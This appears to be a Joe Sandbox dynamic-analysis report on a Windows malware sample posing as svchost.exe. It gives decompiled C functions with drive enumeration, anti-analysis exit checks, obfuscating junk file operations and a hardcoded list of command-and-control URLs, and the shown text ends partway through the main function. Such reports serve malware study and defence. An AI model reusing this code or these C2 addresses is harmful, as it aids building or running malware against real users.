Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 008B2A22

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuery
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
API String ID: 3871184103-3026876182
Opcode ID: be0076c54be87fcf27319bd060182d03ddb21e46b4b0706d9a923ec90deb434a
Instruction ID: 79fff8aae469b8843d8ee75858ad3a4f7dd99320d0b4d7f88936114dbd634ad8
Opcode Fuzzy Hash: be0076c54be87fcf27319bd060182d03ddb21e46b4b0706d9a923ec90deb434a
Instruction Fuzzy Hash: F4111974A40218BFDB24DF94CC49FEEB7B9FB04701F108599EA11AB2C1D7B5AA00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008B1D80, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B1D80(WCHAR* _a4) {
				int _v8;
				short _v1052;
				intOrPtr _v1056;

				_v8 = GetDriveTypeW(_a4);
				_v1056 = _v8;
				if(_v1056 >= 2) {
					if(_v1056 <= 3 || _v1056 == 6) {
						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
							_v8 = 1;
						}
					}
				}
				return _v8;
			}

0x008b1d93
0x008b1d99
0x008b1da6
0x008b1daf
0x008b1dd4
0x008b1dee
0x008b1dee
0x008b1dd4
0x008b1daf
0x008b1dfb

APIs

GetDriveTypeW.KERNEL32(008B1D5F), ref: 008B1D8D
QueryDosDeviceW.KERNEL32(008B1D5F,?,00000208), ref: 008B1DCC
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 008B1DE4

Strings

\??\, xrefs: 008B1DD8

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 6fe3fd96ee067dcd985db3c3b4101fee536b4ba8d2f8bb2817eabc9d991815f0
Instruction ID: 1546f5413610c11ac59bb79e52b6a741cbbf07cbf44cc6a0b57ae61d513b592e
Opcode Fuzzy Hash: 6fe3fd96ee067dcd985db3c3b4101fee536b4ba8d2f8bb2817eabc9d991815f0
Instruction Fuzzy Hash: D50128B4A5020CEBCF20DF55CC5CAD9B7B4FB05305F4481A8AA08EA240EA749B85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 008B2600, Relevance: 6.1, APIs: 4, Instructions: 85
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E008B2600() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v24;
				long _v28;
				short _v556;
				intOrPtr _v560;
				intOrPtr _t29;
				intOrPtr _t33;
				signed int _t35;
				void* _t54;
				void* _t55;

				GetModuleFileNameW(0, 0x8ba8b0, 0x208);
				_t29 = E008B2880(0x8ba8b0);
				_t55 = _t54 + 4;
				 *0x8ba8a8 = _t29;
				while(1 != 0) {
					_v8 = E008B1E00();
					_v12 = 2;
					while(_v12 <= 0x19) {
						_t33 = E008B1D20(_v8, _v12,  &_v24);
						_t55 = _t55 + 0xc;
						_v16 = _t33;
						_v560 = _v16;
						if(_v560 == 2 || _v560 == 4) {
							_t35 = GetVolumeInformationW( &_v24,  &_v556, 0x105, 0, 0,  &_v28, 0, 0);
							__eflags = _t35;
							if(_t35 == 0) {
								__eflags = _v16 - 4;
								__eflags = _v16 == 4;
								E008B20C0(_v28, _v16 == 4,  &_v24, 0, 0x8b6eb0, _v28, ( &_v24 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
								_t55 = _t55 + 0x14;
							} else {
								__eflags = _v16 - 4;
								E008B20C0( &_v24, _v16 - 4,  &_v24, 1,  &_v556, _v28, (_t35 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
								_t55 = _t55 + 0x14;
							}
						}
						_v12 = _v12 + 1;
					}
					Sleep(0x7d0);
				}
				ExitThread(0);
			}

0x008b2615
0x008b2620
0x008b2625
0x008b2628
0x008b262d
0x008b263f
0x008b2642
0x008b2654
0x008b266a
0x008b266f
0x008b2672
0x008b2678
0x008b2685
0x008b26ae
0x008b26b4
0x008b26b6
0x008b26de
0x008b26e2
0x008b26f8
0x008b26fd
0x008b26b8
0x008b26b8
0x008b26d4
0x008b26d9
0x008b26d9
0x008b26b6
0x008b2651
0x008b2651
0x008b270a
0x008b270a
0x008b2717

APIs

GetModuleFileNameW.KERNEL32(00000000,008BA8B0,00000208), ref: 008B2615

Part of subcall function 008B2880: _wfopen.MSVCRT ref: 008B2896
Part of subcall function 008B2880: fseek.MSVCRT ref: 008B28A9
Part of subcall function 008B2880: ftell.MSVCRT ref: 008B28B5
Part of subcall function 008B2880: fclose.MSVCRT ref: 008B28C4

ExitThread.KERNEL32 ref: 008B2717

Part of subcall function 008B1E00: GetLogicalDrives.KERNEL32 ref: 008B1E06
Part of subcall function 008B1E00: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 008B1E54
Part of subcall function 008B1E00: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 008B1E81
Part of subcall function 008B1E00: RegCloseKey.ADVAPI32(?), ref: 008B1E9E

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 008B26AE
Sleep.KERNEL32(000007D0), ref: 008B270A

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: CloseDrivesExitFileInformationLogicalModuleNameOpenQuerySleepThreadValueVolume_wfopenfclosefseekftell
String ID:
API String ID: 3729102641-0
Opcode ID: d356aa36fb68f6b46f886aaaec557d923d094015d5a7d474bc9f13eaae4107a1
Instruction ID: 41309acba86f9d91086f7822a9cd004a692364b25aa42f8c3e190c6f496f6bda
Opcode Fuzzy Hash: d356aa36fb68f6b46f886aaaec557d923d094015d5a7d474bc9f13eaae4107a1
Instruction Fuzzy Hash: D63193B5D00208BBDB14DB94DC4ABEF7774FB08704F104169E606F6391E674A645CF66

Uniqueness

Uniqueness Score: -1.00%

Function 008B2880, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E008B2880(struct _IO_FILE* _a4) {
				struct _IO_FILE* _v8;
				long _v12;
				struct _IO_FILE* _t9;

				_v8 = 0;
				_push(L"rb");
				_t9 = _a4;
				_push(_t9);
				L008B55B2();
				_v8 = _t9;
				fseek(_v8, 0, 2);
				_v12 = ftell(_v8);
				fclose(_v8);
				return _v12;
			}

0x008b2886
0x008b288d
0x008b2892
0x008b2895
0x008b2896
0x008b289e
0x008b28a9
0x008b28bd
0x008b28c4
0x008b28d2

APIs

_wfopen.MSVCRT ref: 008B2896
fseek.MSVCRT ref: 008B28A9
ftell.MSVCRT ref: 008B28B5
fclose.MSVCRT ref: 008B28C4

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: _wfopenfclosefseekftell
String ID:
API String ID: 3257356417-0
Opcode ID: 555d439bd12193c0ab3962dc715210c925cd458ab28a329fb063b5e8b2db41e8
Instruction ID: 0ad24885c266f08f0eab6d9db0e66caf44686f06f9855e776af81690a8f16f0e
Opcode Fuzzy Hash: 555d439bd12193c0ab3962dc715210c925cd458ab28a329fb063b5e8b2db41e8
Instruction Fuzzy Hash: 6EF01CB6D00208BBDB10EFA8DD46B9E7B79EB04701F1041A4F904AB341E535AB149792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 68 Parent PID: 5220 svchost.exeCOMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	514
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AB16D0, Relevance: 1.5, APIs: 1, Instructions: 10
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00ABA8A0,00000000,00000000,00000018,F0000000,?,00AB3EB1), ref: 00AB16E3

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 76059008fe900fa44f26e44e8653e5ba5aea95cfba6fd73456ee176402aae062
Instruction ID: 8a267bb2a762549e2873d11ac3f4642529859ec41ba7005b60b3c242c1a65fc6
Opcode Fuzzy Hash: 76059008fe900fa44f26e44e8653e5ba5aea95cfba6fd73456ee176402aae062
Instruction Fuzzy Hash: 02B092302C434C72E62022C2AC07F80361CA314F11F704000B30A284D289D1300101AE

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2AB0, Relevance: 919.3, APIs: 492, Strings: 32, Instructions: 2324
filesleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00AB2AB0() {
				short _v524;
				char _v528;
				short _v1052;
				void _v1116;
				char _v1118;
				short _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				void _v1164;
				char _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				char _v1184;
				char _v1212;
				short _v1284;
				char _v1288;
				intOrPtr _v1292;
				char _v1296;
				int _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				int _v1340;
				char _v1342;
				short _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				char _v1360;
				short _v1884;
				void* _v1888;
				short _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				intOrPtr _v1904;
				char _v1908;
				void _v1956;
				short* _v1960;
				short* _v1964;
				short* _v1968;
				short* _v1972;
				short* _v1976;
				short* _v1980;
				short* _v1984;
				short* _v1988;
				char _v2508;
				char _v2536;
				short* _v2540;
				short* _v2544;
				short* _v2548;
				short* _v2552;
				short* _v2556;
				short* _v2560;
				short _v2564;
				intOrPtr _v2568;
				intOrPtr _v2572;
				intOrPtr _v2576;
				intOrPtr _v2580;
				char _v2584;
				intOrPtr _v2588;
				intOrPtr _v2592;
				intOrPtr _v2596;
				intOrPtr _v2600;
				intOrPtr _v2604;
				short _v2608;
				intOrPtr _v2612;
				short _v3132;
				char _v3396;
				char _v3424;
				WCHAR* _v3428;
				char _v3948;
				short _v3952;
				intOrPtr _v3956;
				intOrPtr _v3960;
				intOrPtr _v3964;
				intOrPtr _v3968;
				char _v3972;
				char _v3976;
				intOrPtr _v3980;
				intOrPtr _v3984;
				intOrPtr _v3988;
				char _v3992;
				void _v4068;
				void _v4108;
				char _v4132;
				void* _v4136;
				intOrPtr _v4140;
				intOrPtr _v4144;
				intOrPtr _v4148;
				intOrPtr _v4152;
				char _v4156;
				short* _v4160;
				short* _v4164;
				short* _v4168;
				struct HWND__* _v4172;
				intOrPtr _v4176;
				struct HWND__* _v4180;
				void* _v4184;
				intOrPtr _v4188;
				intOrPtr _v4192;
				void* _v4196;
				intOrPtr _v4200;
				intOrPtr _v4204;
				int _v4208;
				int _v4212;
				struct HWND__* _v4216;
				struct HWND__* _v4220;
				int _v4224;
				struct HWND__* _v4228;
				int _v4232;
				int _v4236;
				struct HWND__* _v4240;
				struct HWND__* _v4244;
				int _v4248;
				int _v4252;
				intOrPtr _v4256;
				struct HWND__* _v4260;
				void* _v4264;
				intOrPtr _v4268;
				intOrPtr _v4272;
				void* _v4276;
				intOrPtr _v4280;
				intOrPtr _v4284;
				struct HWND__* _v4288;
				struct HWND__* _v4292;
				int _v4296;
				struct HWND__* _v4300;
				intOrPtr _v4304;
				struct HWND__* _v4308;
				void* _v4312;
				intOrPtr _v4316;
				long _v4320;
				void* _v4324;
				intOrPtr _v4328;
				intOrPtr _v4332;
				struct HWND__* _v4336;
				struct HWND__* _v4340;
				int _v4344;
				signed int _v4348;
				struct HWND__* _v4352;
				intOrPtr _v4356;
				struct HWND__* _v4360;
				void* _v4364;
				intOrPtr _v4368;
				intOrPtr _v4372;
				void* _v4376;
				intOrPtr _v4380;
				intOrPtr _v4384;
				int _v4388;
				int _v4392;
				struct HWND__* _v4396;
				struct HWND__* _v4400;
				int _v4404;
				struct HWND__* _v4408;
				int _v4412;
				int _v4416;
				signed int _v4420;
				signed int _v4424;
				signed char _t574;
				intOrPtr _t576;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr _t580;
				short _t581;
				intOrPtr _t587;
				intOrPtr _t588;
				intOrPtr _t589;
				char _t591;
				intOrPtr _t592;
				intOrPtr _t593;
				intOrPtr _t594;
				intOrPtr _t595;
				char _t596;
				intOrPtr _t597;
				short _t598;
				short _t601;
				void* _t603;
				long _t607;
				void* _t614;
				char* _t616;
				long _t617;
				char* _t619;
				long _t620;
				char* _t621;
				long _t622;
				signed int _t625;
				signed char _t630;
				char* _t688;
				long _t689;
				char* _t691;
				long _t692;
				char* _t706;
				signed int _t714;
				signed int _t716;
				signed int _t718;
				signed char _t736;
				int _t738;
				int _t742;
				int _t747;
				int _t912;
				struct HWND__* _t913;
				struct HWND__* _t983;
				int _t984;
				void* _t1093;
				char _t1094;
				intOrPtr _t1095;
				intOrPtr _t1096;
				intOrPtr _t1099;
				char _t1100;
				intOrPtr _t1111;
				char _t1112;
				intOrPtr _t1113;
				intOrPtr _t1116;
				char _t1117;
				intOrPtr _t1118;
				short _t1119;
				intOrPtr _t1120;
				char _t1121;
				intOrPtr _t1122;
				intOrPtr _t1127;
				char _t1128;
				char _t1231;
				short _t1232;
				intOrPtr _t1233;
				char _t1234;
				intOrPtr _t1235;
				char _t1236;
				intOrPtr _t1237;
				intOrPtr _t1238;
				short _t1239;
				intOrPtr _t1240;
				char _t1241;
				intOrPtr _t1242;
				char _t1243;
				intOrPtr _t1244;
				intOrPtr _t1245;
				intOrPtr _t1246;
				intOrPtr _t1247;
				void* _t1394;
				void* _t1395;
				void* _t1405;
				void* _t1408;
				void* _t1409;
				void* _t1410;
				void* _t1411;
				void* _t1426;
				void* _t1431;

				E00AB55C0(0x1144, _t1093);
				Sleep(0x7d0); // executed
				_v1300 = 0;
				_v2612 = 0x2378;
				while(_v1300 < _v2612) {
					_t983 = FindWindowA("3r38r38r838r838r388r838r83", 0); // executed
					_v4172 = _t983;
					if(_v4172 == 0) {
						L38:
						_t984 = PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e"); // executed
						if(_t984 == 0) {
							L49:
							_v1300 = _v1300 + 1;
							continue;
						}
						_v4232 = 0;
						while(_v4232 < 0xfa0) {
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							_v4232 = _v4232 + 1;
						}
						Sleep(0x1388);
						_v4228 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
						if(_v4228 != 0) {
							DeleteFileA("3r38r38r838r838r388r838r83");
							SetForegroundWindow(_v4172);
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							DeleteFileA("3r38r38r838r838r388r838r83");
							SetFocus(_v4172);
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							Sleep(0xbb8);
						}
						_v4236 = 0;
						while(_v4236 < 0x384) {
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							Sleep(0x1388);
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							_v4236 = _v4236 + 1;
						}
						goto L49;
					}
					Sleep(0xfa0);
					MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
					Sleep(0x3e8);
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					Sleep(0x2328);
					MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
					_v4208 = 0;
					while(_v4208 < 0x384) {
						MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
						Sleep(0xfa0);
						MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						Sleep(0xbb8);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						Sleep(0x7d0);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						Sleep(0xfa0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						_v4208 = _v4208 + 1;
					}
					Sleep(0x3e8);
					DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
					Sleep(0x1770);
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
					Sleep(0x1388);
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					_v4196 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
					DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
					if(_v4196 == 0) {
						L14:
						Sleep(0x1b58);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						InternetCloseHandle(_v4196);
						Sleep(0x2710);
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						ShowWindow(_v4172, 1);
						SetForegroundWindow(_v4172);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						CloseWindow(_v4172);
						MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
						_v4204 = 0x16;
						_v4188 = 0x2c;
						_v4200 = _v4204 + _v4188;
						if(_v4200 < 0x384) {
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
							Sleep(0x7d0);
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
							_v4216 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
							_v4196 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
							if(_v4196 != 0) {
								Sleep(0x1f40);
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								_v4184 = InternetOpenUrlA(_v4196, "http://www.yandex.ru/", 0, 0, 0, 0);
								if(_v4184 != 0) {
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									Sleep(0x1388);
									DeleteFileA("3r38r38r838r838r388r838r83");
									MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									Sleep(0xfa0);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								}
								InternetCloseHandle(_v4184);
								Sleep(0xdac);
							}
							InternetCloseHandle(_v4196);
							Sleep(0x1388);
							if(_v4216 != 0) {
								ShowWindow(_v4216, 0);
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								SetForegroundWindow(_v4216);
								Sleep(0xdac);
								_v4196 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								if(_v4196 != 0) {
									_v4184 = InternetOpenUrlA(_v4196, "http://www.yandex.ru/", 0, 0, 0, 0);
									if(_v4184 != 0) {
										DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
										Sleep(0x1388);
										MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0xbb8);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									}
									InternetCloseHandle(_v4184);
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									Sleep(0x64);
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
									Sleep(0x7d0);
								}
								InternetCloseHandle(_v4196);
							}
						}
						_v4192 = 0xf84b;
						_v4176 = 0x164;
						while(_v4192 > _v4176) {
							_v4220 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							if(_v4220 != 0) {
								Sleep(0x7d0);
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								Sleep(0x1388);
								_v4176 = _v4176 + 1;
							}
						}
						if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
							DeleteFileA("3r38r38r838r838r388r838r83");
							Sleep(0xfa0);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							Sleep(0x1f4);
							MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						}
						_v4180 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
						if(_v4180 != 0) {
							Sleep(0x1388);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							SetForegroundWindow(_v4172);
							MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
							ShowWindow(_v4172, 1);
							Sleep(0x1f4);
							ShowWindow(_v4172, 1);
							Sleep(0x3a98);
							MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "2uu5uii55i5i25i52i5ii2525i5i25i");
							DeleteFileA("3r38r38r838r838r388r838r83");
							ShowWindow(_v4172, 0);
							Sleep(0x1f4);
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						}
						_v4224 = 0;
						while(_v4224 < 0x320) {
							Sleep(0x1388);
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							_v4224 = _v4224 + 1;
						}
						goto L38;
					}
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
					MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
					Sleep(0x1388);
					DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
					Sleep(0xbb8);
					DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
					_v4184 = InternetOpenUrlA(_v4196, "http://www.yandex.ru/", 0, 0, 0, 0);
					Sleep(0x7d0);
					if(_v4184 == 0) {
						L13:
						InternetCloseHandle(_v4184);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						goto L14;
					}
					_v4212 = 0;
					while(_v4212 < 0x320) {
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						Sleep(0x7d0);
						MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
						Sleep(0xfa0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						_v4212 = _v4212 + 1;
					}
					goto L13;
				}
				Sleep(0x1f4); // executed
				_t574 = E00AB2930(); // executed
				if((_t574 & 0x000000ff) == 1 || (E00AB28E0() & 0x000000ff) == 1) {
					ExitProcess(0);
				} else {
					_t1231 = "tyu6uyur"; // 0x36757974
					_v1296 = _t1231;
					_t576 =  *0xab6fec; // 0x72757975
					_v1292 = _t576;
					_t1094 =  *0xab6ff0; // 0x0
					_v1288 = _t1094;
					_t1232 = L"svchost.exe"; // 0x760073
					_v2608 = _t1232;
					_t577 = M00AB6FF8; // 0x680063
					_v2604 = _t577;
					_t1095 = M00AB6FFC; // 0x73006f
					_v2600 = _t1095;
					_t1233 = M00AB7000; // 0x2e0074
					_v2596 = _t1233;
					_t578 =  *0xab7004; // 0x780065
					_v2592 = _t578;
					_t1096 =  *0xab7008; // 0x65
					_v2588 = _t1096;
					memcpy( &_v1284, L"Host Process for Windows Services", 0x11 << 2);
					_v1988 = "http://185.215.113.10/";
					_v1984 = "http://tsrv3.ru/";
					_v1980 = "http://tsrv4.ws/";
					_v1976 = "http://tsrv5.top/";
					_v1972 = "http://thaus.ws/";
					_v1968 = "http://zzruuoooshfrohu.su/";
					_v1964 = "http://tldrbox.top/";
					_v1960 = "http://thaus.ws/";
					_v2560 = "1";
					_v2556 = "2";
					_v2552 = "3";
					_v2548 = "4";
					_v2544 = "5";
					_v2540 = "6";
					_v4168 = L"%systemdrive%";
					_v4164 = L"%userprofile%";
					_v4160 = L"%temp%";
					_t1234 =  *0xab715c; // 0xb0a2b895
					_v1360 = _t1234;
					_t580 =  *0xab7160; // 0x90b4bdb3
					_v1356 = _t580;
					_t1099 =  *0xab7164; // 0x82b8a5bf
					_v1352 = _t1099;
					_t1235 =  *0xab7168; // 0xb0a6a8a1
					_v1348 = _t1235;
					_t581 =  *0xab716c; // 0xb4a3
					_v1344 = _t581;
					_t1100 =  *0xab716e; // 0x0
					_v1342 = _t1100;
					memcpy( &_v2536, 0xab7170, 7 << 2);
					memcpy( &_v1212, 0xab718c, 6 << 2);
